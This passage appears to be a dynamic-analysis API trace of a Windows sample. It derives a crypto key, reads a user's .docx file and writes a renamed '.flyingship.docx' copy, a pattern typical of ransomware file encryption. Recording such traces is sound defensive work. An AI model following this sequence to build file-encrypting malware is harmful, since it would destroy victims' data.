wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.854] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0175.854] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0175.854] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.854] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.855] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.855] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0175.855] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.855] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.855] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0175.855] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.855] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0175.855] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0175.855] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.855] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.855] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0175.855] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.855] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0175.855] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0175.855] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.855] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.855] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.855] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.855] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0175.855] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.856] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.856] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0175.856] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.856] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.856] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.856] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.856] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0175.856] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.856] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.856] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.856] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.856] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.856] CryptHashData (hHash=0x90ae18, pbData=0x8df1e0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0175.856] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.856] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.856] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.856] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.856] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.856] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0175.857] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0175.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.857] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0175.857] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.857] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.857] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.857] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.857] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.857] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0175.857] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0175.857] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0175.857] CryptDestroyHash (hHash=0x90ae18) returned 1 [0175.857] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0175.857] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.857] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.857] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.857] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.859] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\olilemgshp90h.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0175.859] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0175.859] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0175.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0175.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0175.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0175.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0175.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0175.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0175.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0175.859] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0175.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0175.859] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0175.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0175.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.859] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0175.860] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0175.860] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0175.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0175.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0175.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.860] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0175.860] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0175.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0175.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0175.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0175.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0175.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0175.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0175.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0175.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0175.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0175.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923ad0 [0175.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0175.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923b28 [0175.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0175.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0175.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0175.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0175.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0175.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0175.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0175.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0175.861] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.861] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0175.862] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0175.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0175.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923b28 | out: hHeap=0x8a0000) returned 1 [0175.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0175.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0175.862] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0175.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0175.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0175.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0175.862] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0175.862] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\oLilEMGSHp90H.flyingship.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\olilemgshp90h.flyingship.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0175.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0175.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0175.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0175.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0175.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0175.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0175.863] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0175.863] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0175.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0175.863] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0175.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0175.864] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90aed8 | out: hHeap=0x8a0000) returned 1 [0175.864] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90aed8 [0175.864] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0175.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0175.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0175.864] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0175.864] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x100000) returned 0x2420020 [0175.865] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0175.865] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x6cc4, lpOverlapped=0x0) returned 1 [0175.869] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0175.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0175.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.869] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0175.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.869] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6cc4) returned 0xa7f018 [0175.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0175.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0175.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0175.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0175.870] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0175.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0175.870] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6cc4) returned 0xa85ce8 [0175.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa7f018 | out: hHeap=0x8a0000) returned 1 [0175.871] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0175.871] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0175.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0175.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0175.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0175.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0175.871] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 